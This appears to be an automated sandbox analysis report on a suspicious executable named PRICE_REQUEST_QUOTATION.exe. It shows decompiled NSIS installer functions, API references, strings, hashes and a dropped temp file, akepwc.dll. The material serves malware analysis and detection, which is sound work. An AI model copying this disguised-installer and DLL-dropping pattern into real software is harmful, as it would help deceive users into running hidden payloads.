String ID: "C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$TclpOwkq$_Nb
API String ID: 1975747703-3258619484
Opcode ID: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
Instruction ID: 439cf4cca7a437fbaee012d0436cdd450a481f2d9ea16570e6e497c3a9acd7f8
Opcode Fuzzy Hash: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
Instruction Fuzzy Hash: 4861C6B16042007EE220BF629C45E273AACEB44759F44447FF941B62E2DB7DA9418A3E

Uniqueness

Uniqueness Score: -1.00%

Function 00402C55, Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00402C55(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				signed int _t54;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\alfons\\Desktop\\PRICE_REQUEST_QUOTATION.exe";
				 *0x42ec2c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\alfons\\Desktop\\PRICE_REQUEST_QUOTATION.exe", 0x400);
				_t89 = E0040589E(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409014 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\alfons\\Desktop";
				E00405BC7("C:\\Users\\alfons\\Desktop", _t91);
				E00405BC7(0x436000, E00405701(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x428c50 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BF1(1);
					__eflags =  *0x42ec34 - _t82; // 0x8800
					if(__eflags == 0) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						_t54 =  *0x42ec34; // 0x8800
						E004030E2(_t54 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00402E8E(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42ec30 = _t94;
							 *0x42ec38 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42ec3c =  *0x42ec3c + 1;
								__eflags =  *0x42ec3c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E0040585F(0x42ec40, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004030E2( *0x414c40);
					_t65 = E004030B0( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t67 =  *0x42ec34; // 0x8800
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E004030B0(0x420c50, _t90); // executed
						__eflags = _t71;
						if(_t71 == 0) {
							E00402BF1(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42ec34;
						if( *0x42ec34 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BF1(0);
							}
							goto L20;
						}
						E0040585F( &_v44, 0x420c50, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x414c40; // 0x8800
						 *0x42ecc0 =  *0x42ecc0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42ec34 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t93 = _t80 - 4;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x428c50;
						if(_t93 <  *0x428c50) {
							_v12 = E00405FC6(_v12, 0x420c50, _t90);
						}
						 *0x414c40 =  *0x414c40 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x00402c5d
0x00402c60
0x00402c63
0x00402c66
0x00402c6c
0x00402c7d
0x00402c82
0x00402c95
0x00402c9a
0x00402c9d
0x00402ca3
0x00000000
0x00402ca5
0x00402cb0
0x00402cb6
0x00402cc7
0x00402cce
0x00402cd4
0x00402cd6
0x00402cdb
0x00402cdd
0x00402dca
0x00402dcc
0x00402dd1
0x00402dd8
0x00000000
0x00000000
0x00402dda
0x00402ddd
0x00402e01
0x00402e06
0x00402e0c
0x00402e0e
0x00402e17
0x00402e1c
0x00402e1f
0x00402e20
0x00402e21
0x00402e23
0x00402e28
0x00402e2b
0x00402e3e
0x00402e42
0x00402e4a
0x00402e4f
0x00402e51
0x00402e51
0x00402e51
0x00402e59
0x00402e59
0x00402e5c
0x00402e5d
0x00402e5d
0x00402e60
0x00402e62
0x00402e62
0x00402e62
0x00402e6c
0x00402e72
0x00402e80
0x00402e85
0x00000000
0x00402e85
0x00000000
0x00402e2b
0x00402de5
0x00402df0
0x00402df5
0x00402df7
0x00000000
0x00000000
0x00402dfc
0x00402dff
0x00000000
0x00000000
0x00000000
0x00402ce3
0x00402ce8
0x00402ce8
0x00402ced
0x00402cf1
0x00402cf8
0x00402cfd
0x00402cff
0x00402d01
0x00402d01
0x00402d05
0x00402d0a
0x00402d0c
0x00402e36
0x00402e2d
0x00000000
0x00402e2d
0x00402d12
0x00402d19
0x00402d95
0x00402d99
0x00402d9d
0x00402da2
0x00000000
0x00402d99
0x00402d22
0x00402d27
0x00402d2a
0x00402d2f
0x00000000
0x00000000
0x00402d31
0x00402d38
0x00000000
0x00000000
0x00402d3a
0x00402d41
0x00000000
0x00000000
0x00402d43
0x00402d4a
0x00000000
0x00000000
0x00402d4c
0x00402d53
0x00000000
0x00000000
0x00402d55
0x00402d5b
0x00402d64
0x00402d6a
0x00402d6d
0x00402d6f
0x00402d75
0x00000000
0x00000000
0x00402d7b
0x00402d7f
0x00402d87
0x00402d87
0x00402d8a
0x00402d8d
0x00402d8f
0x00402d91
0x00402d91
0x00000000
0x00402d8f
0x00402d81
0x00402d85
0x00000000
0x00000000
0x00000000
0x00402da3
0x00402da3
0x00402da9
0x00402db5
0x00402db5
0x00402db8
0x00402dbe
0x00402dc0
0x00402dc0
0x00402dc8
0x00402dc8
0x00000000
0x00402dc8

APIs

GetTickCount.KERNEL32 ref: 00402C66
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe,00000400), ref: 00402C82

Part of subcall function 0040589E: GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe,80000000,00000003), ref: 004058A2
Part of subcall function 0040589E: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4

GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe,C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe,80000000,00000003), ref: 00402CCE

Strings

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E2D
Null, xrefs: 00402D4C
C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe, xrefs: 00402C6C, 00402C7B, 00402C8F, 00402CAF
C:\Users\user\Desktop, xrefs: 00402CB0, 00402CB5, 00402CBB
soft, xrefs: 00402D43
Error launching installer, xrefs: 00402CA5
Inst, xrefs: 00402D3A
"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" , xrefs: 00402C55
C:\Users\user\AppData\Local\Temp\, xrefs: 00402C5F

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 4283519449-1371113636
Opcode ID: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
Instruction ID: 196f3fd9364ed88bbd27218647615838fe3130e8ea263fbe41a0cbd6df82c613
Opcode Fuzzy Hash: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
Instruction Fuzzy Hash: 6A510871941218ABDB609F66DE89B9E7BB8EF00314F10403BF904B62D1CBBC9D418B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00402E8E, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 174
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00402E8E(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t67;
				void* _t68;
				long _t74;
				intOrPtr _t79;
				long _t80;
				void* _t82;
				int _t84;
				intOrPtr _t95;
				void* _t97;
				void* _t100;
				long _t101;
				signed int _t102;
				long _t103;
				int _t104;
				intOrPtr _t105;
				long _t106;
				void* _t107;

				_t102 = _a16;
				_t97 = _a12;
				_v12 = _t102;
				if(_t97 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t97;
				if(_t97 == 0) {
					_v16 = 0x418c48;
				}
				_t65 = _a4;
				if(_a4 >= 0) {
					_t95 =  *0x42ec78; // 0x9ef0
					E004030E2(_t95 + _t65);
				}
				_t67 = E004030B0( &_a16, 4); // executed
				if(_t67 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t97 == 0) {
							while(_a16 > 0) {
								_t103 = _v12;
								if(_a16 < _t103) {
									_t103 = _a16;
								}
								if(E004030B0(0x414c48, _t103) == 0) {
									goto L34;
								} else {
									if(WriteFile(_a8, 0x414c48, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t68);
										return _t68;
									} else {
										_v8 = _v8 + _t103;
										_a16 = _a16 - _t103;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t102) {
							_t102 = _a16;
						}
						if(E004030B0(_t97, _t102) != 0) {
							_v8 = _t102;
							goto L45;
						} else {
							goto L34;
						}
					}
					_t74 = GetTickCount();
					 *0x40b5ac =  *0x40b5ac & 0x00000000;
					 *0x40b5a8 =  *0x40b5a8 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t74;
					 *0x40b090 = 8;
					 *0x414c38 = 0x40cc30;
					 *0x414c34 = 0x40cc30;
					 *0x414c30 = 0x414c30;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t104 = 0x4000;
						if(_a16 < 0x4000) {
							_t104 = _a16;
						}
						if(E004030B0(0x414c48, _t104) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t104;
						 *0x40b080 = 0x414c48;
						 *0x40b084 = _t104;
						while(1) {
							_t100 = _v16;
							 *0x40b088 = _t100;
							 *0x40b08c = _v12;
							_t79 = E00406034(0x40b080);
							_v28 = _t79;
							if(_t79 < 0) {
								break;
							}
							_t105 =  *0x40b088; // 0x419301
							_t106 = _t105 - _t100;
							_t80 = GetTickCount();
							_t101 = _t80;
							if(( *0x42ecd4 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t107 = _t107 + 0xc;
								E00404EB3(0,  &_v92);
								_v20 = _t101;
							}
							if(_t106 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_t82 =  *0x40b088; // 0x419301
									_v8 = _v8 + _t106;
									_v12 = _v12 - _t106;
									_v16 = _t82;
									L24:
									if(_v28 != 1) {
										continue;
									}
									goto L45;
								}
								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
								if(_t84 == 0 || _v24 != _t106) {
									goto L29;
								} else {
									_v8 = _v8 + _t106;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}

0x00402e96
0x00402e9a
0x00402e9d
0x00402ea2
0x00402ea4
0x00402ea4
0x00402eab
0x00402eaf
0x00402eb4
0x00402eb6
0x00402eb6
0x00402ebd
0x00402ec2
0x00402ec4
0x00402ecd
0x00402ecd
0x00402ed8
0x00402edf
0x0040305b
0x0040305b
0x00000000
0x00402ee5
0x00402ee9
0x00403046
0x0040309b
0x00403060
0x00403066
0x00403068
0x00403068
0x00403079
0x00000000
0x0040307b
0x0040308e
0x00403040
0x00403040
0x0040305d
0x0040305d
0x00000000
0x00403095
0x00403095
0x00403098
0x00000000
0x00403098
0x0040308e
0x00403079
0x004030a6
0x00000000
0x004030a6
0x0040304b
0x0040304d
0x0040304d
0x00403059
0x004030a3
0x00000000
0x00000000
0x00000000
0x00000000
0x00403059
0x00402ef5
0x00402ef7
0x00402efe
0x00402f05
0x00402f05
0x00402f0c
0x00402f14
0x00402f1e
0x00402f23
0x00402f2b
0x00402f35
0x00402f38
0x00000000
0x00000000
0x00000000
0x00000000
0x00402f3e
0x00402f3e
0x00402f3e
0x00402f46
0x00402f48
0x00402f48
0x00402f59
0x00000000
0x00000000
0x00402f5f
0x00402f62
0x00402f68
0x00402f6e
0x00402f6e
0x00402f79
0x00402f7f
0x00402f84
0x00402f8b
0x00402f8e
0x00000000
0x00000000
0x00402f94
0x00402f9a
0x00402f9c
0x00402fa5
0x00402fa7
0x00402fd5
0x00402fdb
0x00402fe4
0x00402fe9
0x00402fe9
0x00402ff0
0x00403034
0x00000000
0x00000000
0x00000000
0x00402ff2
0x00402ff5
0x00403017
0x0040301c
0x0040301f
0x00403022
0x00403025
0x00403029
0x00000000
0x00000000
0x00000000
0x0040302f
0x00403003
0x0040300b
0x00000000
0x00403012
0x00403012
0x00000000
0x00403012
0x0040300b
0x00402ff0
0x0040303c
0x00000000
0x0040303c
0x00000000
0x00402f3e

APIs

GetTickCount.KERNEL32 ref: 00402EF5
GetTickCount.KERNEL32 ref: 00402F9C
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402FC5
wsprintfA.USER32 ref: 00402FD5
WriteFile.KERNELBASE(00000000,00000000,00419301,7FFFFFFF,00000000), ref: 00403003

Strings

... %d%%, xrefs: 00402FCF
HLA, xrefs: 00402F4B
HLA, xrefs: 0040306B

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: CountTick$FileWritewsprintf
String ID: ... %d%%$HLA$HLA
API String ID: 4209647438-295942573
Opcode ID: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
Instruction ID: 15109c7e5c0d48913ae26536c30eb2ff4c12f072ab55fd5dd83b367320b2a29b
Opcode Fuzzy Hash: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
Instruction Fuzzy Hash: 2C618E71902219DBDB10DF65EA44AAF7BB8EB04356F10417BF910B72C4D7789A40CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 00401751, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401751(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402A29(0x31);
				 *(_t85 - 0xc) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405727(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E004056BA(E00405BC7(0x409c40, "C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c40);
					E00405BC7();
				}
				E00405E29(0x409c40);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405EC2(0x409c40);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040587F(0x409c40);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040589E(0x409c40, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404EB3(0xffffffe2,  *(_t85 - 0xc));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42eca8;
						goto L32;
					} else {
						E00405BC7(0x40a440, 0x42f000);
						E00405BC7(0x42f000, 0x409c40);
						E00405BE9(_t75, 0x40a440, 0x409c40, "C:\Users\alfons\AppData\Local\Temp\nsi8CF7.tmp\akepwc.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00405BC7(0x42f000, 0x40a440);
						_t62 = E00405488("C:\Users\alfons\AppData\Local\Temp\nsi8CF7.tmp\akepwc.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42eca8 =  &( *0x42eca8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c40);
								_push(0xfffffffa);
								E00404EB3();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404EB3(0xffffffea,  *(_t85 - 0xc));
				 *0x42ecd4 =  *0x42ecd4 + 1;
				_t43 = E00402E8E( *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 8), _t75, _t75); // executed
				 *0x42ecd4 =  *0x42ecd4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 8)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405BE9(_t75, _t80, 0x409c40, 0x409c40, 0xffffffee);
					} else {
						E00405BE9(_t75, _t80, 0x409c40, 0x409c40, 0xffffffe9);
						lstrcatA(0x409c40,  *(_t85 - 0xc));
					}
					_push(0x200010);
					_push(0x409c40);
					E00405488();
					goto L29;
				}
				goto L33;
			}

0x00401751
0x00401758
0x00401761
0x00401764
0x00401767
0x0040176c
0x00401774
0x00401790
0x00401776
0x00401776
0x00401777
0x00401777
0x00401796
0x004017a0
0x004017a0
0x004017a4
0x004017a7
0x004017ac
0x004017ae
0x004017b0
0x004017b5
0x004017b5
0x004017c0
0x004017c0
0x004017d1
0x004017d3
0x004017d3
0x004017d4
0x004017d4
0x004017d7
0x004017da
0x004017dd
0x004017dd
0x004017e4
0x004017f3
0x004017f8
0x004017fb
0x004017fe
0x00000000
0x00000000
0x00401800
0x00401803
0x0040185d
0x00401862
0x004015a8
0x0040268f
0x0040268f
0x004028be
0x004028c1
0x004028c1
0x00000000
0x00401805
0x0040180b
0x00401816
0x00401823
0x0040182e
0x00401844
0x00401844
0x00401847
0x00000000
0x0040184d
0x0040184d
0x0040184e
0x0040186b
0x004028c7
0x004028c7
0x004028c7
0x00401850
0x00401850
0x00401851
0x00401492
0x00402241
0x00402241
0x00402241
0x0040184e
0x00401847
0x004028c9
0x004028cd
0x004028cd
0x0040187b
0x00401880
0x0040188e
0x00401893
0x00401899
0x0040189d
0x0040189f
0x004018a7
0x004018b3
0x004018a1
0x004018a1
0x004018a5
0x00000000
0x00000000
0x004018a5
0x004018bc
0x004018c2
0x004018c4
0x00000000
0x004018ca
0x004018ca
0x004018cd
0x004018e5
0x004018cf
0x004018d2
0x004018db
0x004018db
0x004018ea
0x004018ef
0x0040223c
0x00000000
0x0040223c
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,TclpOwkq,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
CompareFileTime.KERNEL32(-00000014,?,TclpOwkq,TclpOwkq,00000000,00000000,TclpOwkq,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA

Part of subcall function 00405BC7: lstrcpynA.KERNEL32(?,?,00000400,004031D8,jwfmxhqapdbzygp Setup,NSIS Error), ref: 00405BD4

Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,00419301,7519EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,00419301,7519EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,00419301,7519EA30), ref: 00404F0F
Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F47
Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F61
Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F6F

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 0040177E
TclpOwkq, xrefs: 0040176D, 00401783, 00401795, 004017A6, 004017DC, 004017F2, 00401810, 00401850, 004018D1, 004018DA, 004018E4, 004018EF
C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp\akepwc.dll, xrefs: 0040181E, 0040183A
C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp, xrefs: 0040179B, 0040180A, 00401828

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp$C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp\akepwc.dll$TclpOwkq
API String ID: 1941528284-1346630671
Opcode ID: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
Instruction ID: c8ecff54efbd1983964958a71a4b78ec9a68474d29a8073c081a3edbe3f43163
Opcode Fuzzy Hash: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
Instruction Fuzzy Hash: 8541B631904514BBCB107BA6CC45DAF3678EF01329F60823BF521F11E1D63CAA419EAE

Uniqueness

Uniqueness Score: -1.00%

Function 00405375, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405375(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x40735c;
				_v36.Group = 0x40735c;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x40734c;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405380
0x00405384
0x00405387
0x0040538d
0x00405391
0x00405395
0x0040539d
0x004053a4
0x004053aa
0x004053b1
0x004053b8
0x004053c0
0x004053c2
0x00000000
0x004053c2
0x004053cc
0x004053d3
0x004053e9
0x00000000
0x00000000
0x00000000
0x004053eb
0x004053ef

APIs

CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 004053B8
GetLastError.KERNEL32 ref: 004053CC
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053E1
GetLastError.KERNEL32 ref: 004053EB

Strings

C:\Users\user\Desktop, xrefs: 00405375
Ls@, xrefs: 004053AA
\s@, xrefs: 0040537B

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
